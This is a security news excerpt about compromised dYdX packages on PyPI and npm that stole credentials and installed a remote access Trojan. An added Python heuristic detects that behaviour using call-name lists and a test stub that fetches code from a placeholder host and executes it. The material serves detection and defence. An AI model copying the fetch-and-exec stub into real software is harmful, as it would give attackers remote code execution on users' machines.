
"The malicious code available on PyPI contained the same credential theft function, although it also implemented a remote access Trojan (RAT) that allowed the execution of new malware on infected systems. The backdoor received commands from dydx[.]priceoracle[.]site. The domain was registered on January 9, 17 days before the malicious package was uploaded to PyPI."
"The RAT, Socket said:
- Runs as a background daemon thread
- Beacons to the C2 server every 10 seconds
- Receives Python code from the server
- Executes it in an isolated subprocess with no visible output
- Uses a hardcoded authorization token: 490CD9DAD3FAE1F59521C27A96B32F5D677DD41BF1F706A0BF85E69CA6EBFE75
Once installed, the threat actors could:
- Execute arbitrary Python code with user privileges
- Steal SSH keys, API credentials, and source code
- Install persistent backdoors
- Exfiltrate sensitive files
- Monitor user activity
- Modify critical files
- Pivot to other systems on the network"
"Viewed alongside the 2022 npm supply chain compromise and the 2024 DNS hijacking incident, this [latest] attack highlights a persistent pattern of adversaries targeting dYdX-related assets through trusted distribution channels," Socket said. "The threat actor simultaneously compromised packages in both npm and PyPI ecosystems, expanding the attack surface to reach JavaScript and Python developers working with dYdX."
Malicious packages published to PyPI and npm included credential-stealing code and a remote access Trojan that received commands from dydx[.]priceoracle[.]site. The control domain was registered on January 9, 17 days before the PyPI upload. The RAT runs as a background daemon, beacons to its C2 every 10 seconds, receives Python code, executes it in an isolated subprocess with no visible output, and uses a hardcoded authorization token. Operators gaining access can execute arbitrary Python, steal SSH keys and API credentials, install backdoors, exfiltrate files, monitor activity, modify critical files, and pivot across networks. The packages were published from official dYdX accounts, indicating account compromise and an expanded attack surface affecting JavaScript and Python developers.
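The RAT described above combines three behaviours a defender can look for in a freshly installed package: a daemon thread, a periodic network fetch, and dynamic execution of whatever comes back. The following added example (not code from the article, Socket, or the malicious package) is a small AST-based heuristic that flags a Python module only when that whole chain is present; the two source samples are constructed test fixtures, and the call-name lists are an assumption, not an exhaustive signature.

```python
import ast
import re
from typing import List

# Constructed fixture: a non-functional stub that merely contains the
# indicators the report lists (daemon thread, network fetch, exec, 64-hex token).
SUSPECT = '''
import threading, urllib.request
TOKEN = "0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef"
def loop():
    code = urllib.request.urlopen("https://c2.example.invalid/").read()
    exec(code)
threading.Thread(target=loop, daemon=True).start()
'''

# Constructed fixture: an ordinary module that should not be flagged.
BENIGN = '''
import json
def load(path):
    with open(path) as fh:
        return json.load(fh)
'''

NETWORK_CALLS = {"urlopen", "get", "post", "request", "HTTPConnection", "HTTPSConnection"}
DYNAMIC_EXEC = {"exec", "eval", "Popen", "run", "check_output"}
DAEMON_CALLS = {"setDaemon"}
HEX_TOKEN = re.compile(r"^[0-9A-Fa-f]{64}$")  # SHA-256-sized hardcoded secret


def _call_name(node: ast.Call) -> str:
    """Return the attribute or bare name being called, or '' if neither."""
    f = node.func
    return f.attr if isinstance(f, ast.Attribute) else getattr(f, "id", "")


def scan_source(src: str) -> List[str]:
    """Return the sorted set of indicator names found in a module's source."""
    found = set()
    for node in ast.walk(ast.parse(src)):
        if isinstance(node, ast.Call):
            name = _call_name(node)
            if name in NETWORK_CALLS:
                found.add("network_call")
            if name in DYNAMIC_EXEC:
                found.add("dynamic_exec")
            if name in DAEMON_CALLS or any(kw.arg == "daemon" for kw in node.keywords):
                found.add("daemon_thread")
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            if HEX_TOKEN.match(node.value):
                found.add("hardcoded_hex_token")
    return sorted(found)


def is_suspect(src: str) -> bool:
    """Flag only when the full fetch-and-execute-in-background chain is present."""
    return {"network_call", "dynamic_exec", "daemon_thread"} <= set(scan_source(src))
```

Run `scan_source` over each `.py` file under a site-packages or node_modules-adjacent Python tree after an install; a single indicator is common in legitimate code, which is why `is_suspect` requires the combination.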
Read at Ars Technica